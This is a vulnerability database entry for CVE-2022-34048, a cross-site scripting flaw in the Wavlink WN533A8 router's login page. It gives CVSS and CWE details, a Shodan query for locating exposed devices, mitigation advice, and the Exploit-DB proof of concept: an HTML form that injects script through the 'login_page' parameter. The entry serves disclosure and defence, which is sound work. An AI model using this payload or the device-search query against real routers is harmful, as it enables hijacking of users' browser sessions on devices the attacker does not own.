Wavlink WN533A8 - Cross-Site Scripting (XSS)

vendor:

WN533A8

by:

Ahmed Alroky

6.1

CVSS

MEDIUM

Cross-Site Scripting (XSS)

CWE

Product Name: WN533A8

Affected Version From: M33A8.V5030.190716

Affected Version To: M33A8.V5030.190716

Patch Exists: NO

Related CWE: CVE-2022-34048

CPE: a:wavlink:wn533a8

Metasploit:

Other Scripts:

Tags: cve2022,wavlink,xss,router,edb,cve

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Nuclei References: https://www.exploit-db.com/exploits/50989, https://drive.google.com/file/d/1xznFhH3w3TDN2RCdX62_ebylR4yaKmzf/view?usp=sharing, https://drive.google.com/file/d/1NI3-k3AGIsSe2zjeigl1GVyU1VpG1SV3/view?usp=sharing, https://nvd.nist.gov/vuln/detail/CVE-2022-34048

Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.html:"Wavlink"', 'verified': True, 'vendor': 'wavlink', 'product': 'wn533a8_firmware'}

Platforms Tested: Windows

2020

Wavlink WN533A8 – Cross-Site Scripting (XSS)

A Cross-Site Scripting (XSS) vulnerability exists in Wavlink WN533A8, which allows an attacker to inject malicious JavaScript code into the application. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The vulnerability is due to insufficient validation of user-supplied input in the 'login_page' parameter of the 'login.cgi' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server.

Mitigation:

Input validation should be used to prevent Cross-Site Scripting (XSS) attacks. The application should validate all input data for length, type, and syntax. All HTML metacharacters should be removed or encoded before being returned to the user.

Source

Exploit-DB raw data:

# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M33A8.V5030.190716
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34048
# Tested on: Windows

# Poc code
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST">
      <input type="hidden" name="newUI" value="1" />
      <input type="hidden" name="page" value="login" />
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="langChange" value="0" />
     <input type="hidden" name="ipaddr" value="196&#46;219&#46;234&#46;10" />
      <input type="hidden" name="login&#95;page" value="x"&#41;&#59;alert&#40;9&#41;&#59;x&#61;&#40;"" />
      <input type="hidden" name="homepage" value="main&#46;shtml" />
      <input type="hidden" name="sysinitpage" value="sysinit&#46;shtml" />
      <input type="hidden" name="wizardpage" value="wiz&#46;shtml" />
      <input type="hidden" name="hostname" value="59&#46;148&#46;80&#46;138" />
      <input type="hidden" name="key" value="M94947765" />
      <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" />
      <input type="hidden" name="lang&#95;select" value="en" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>